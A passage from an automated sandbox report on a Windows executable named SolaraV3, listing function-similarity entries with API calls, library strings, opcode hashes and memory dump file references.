                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF09054F0920F41FE695B6E98797BC52845F88B80F4CA532CD0FC63C2EE1CE6A34210
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6DC710C90,?,?,?,00007FF6DC7122FA,?,?,?,?,?,00007FF6DC713AE9), ref: 00007FF6DC71D63A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction ID: 99ec219f8cf046e9289f3b5593592994e25866adea525afe5e7e9f8b82c70968
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F08210F0C20F45FE661775582527C12944FD47E0F082732DC2EC62C2DE3CA4A38910
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction ID: 91f8c131e1af8d518885a39eb8fd539c91bda2667e277093d0ec9d07a938cc97
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A029524A0EB0FD5FA359B56E8645BCA3A1AF18745F941037D82E82260EF3CB56BD704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction ID: 2769bec3b735b2c68d672406c1a786782c2ab956f1997812304570ab5e0fe993
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6B2F372F1828A8BE7758E64D4607FCB7A1FB55388F505136DA0E97A84DF38E912CB40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                              • Instruction ID: 10d6defc105358fa8f69cc94e3c0afbadf8f652ce5e537a380f46786f9d1608f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D520372A146AA8BD7A48F15C458B7E3BB9FB44340F11413AE64AC7780DF3EE951DB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction ID: 564a769d78f6f7348ade173c874a946f8c09c260890834bf171ae7ab098c6bab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9313E72608B858AEB708F61E8903EE73B4FB94744F44403ADA4E87B99DF38D559C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725C45
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A909
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A92E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725C34
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725EAA
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725EBB
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725ECC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction ID: 740a22a3d9c5a59e482d2a3243f6d1f5ee3c22f031c12653f13af1f0ca93a048
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AED1C126E0824A46E770DF26D8A15BDA762FF84798F448137EA0DC7695EF3CE4638740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction ID: 0d71608eff498561538785c27ceb292077e6ce3557bc13c01e4d7a663ebd33b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA319336A08F858ADB60CF25E8502AE73B4FB88754F544136EA9D83B95DF3CD166CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                              • Instruction ID: b1c804c7149906916c15a875c6f53f7623fee7dba1f9656606373445430616db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB1F622B1869A42EA719B2695201BDA7A0FB44BE4F545133EE4D87BD5DE3CE863C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725EAA
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725EBB
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DC725ECC
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC7255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255DC
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                              • Instruction ID: 2e999d5bedbcb71b993dd2b8a3e3d47e016d192ce6285883294a4ee3d5cdc706
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC519F32A0864A86E770DF26D8A15BDB761FB88798F408137EA4DC7695DF3CE4628740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction ID: ce08adde9aabb61b9443b9aac59d83fd0334e1be90b2680114abd763de43213f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40113C22B14F098AEB10CF70E8542BD33A4FB59758F440E36EA6D867A4DF7CD1668340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 3f7811fcddcccd83817986bd767203a5871a63c02d0c5b1ecae646f1f39e62a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71C1F372B1828A87E734CF1AA05466EF7A5F784B84F408136DB4A87784DF3DE956CB40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                              • Instruction ID: a869e4f6a68020f1162b2c4b50732bf32f23ab920789faeb0413274db84f46b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b299fc273864699ec3bddfbf8fc958dab4a7742ffdf8f0166f3b43fcc42d1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F18F72E183C98AE7A58B1AC088A3E3AF9FF44754F25453ADA4987390CF39E552D740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                              • Instruction ID: 7e2dc7f4391b138ae2814458dfc3d3971bcae53f213a2a9b3eec097b9e268baf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5B15077604B898BE725CF29C85636C7BA0F784B58F198926DB9D837A4CF39D462C700
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
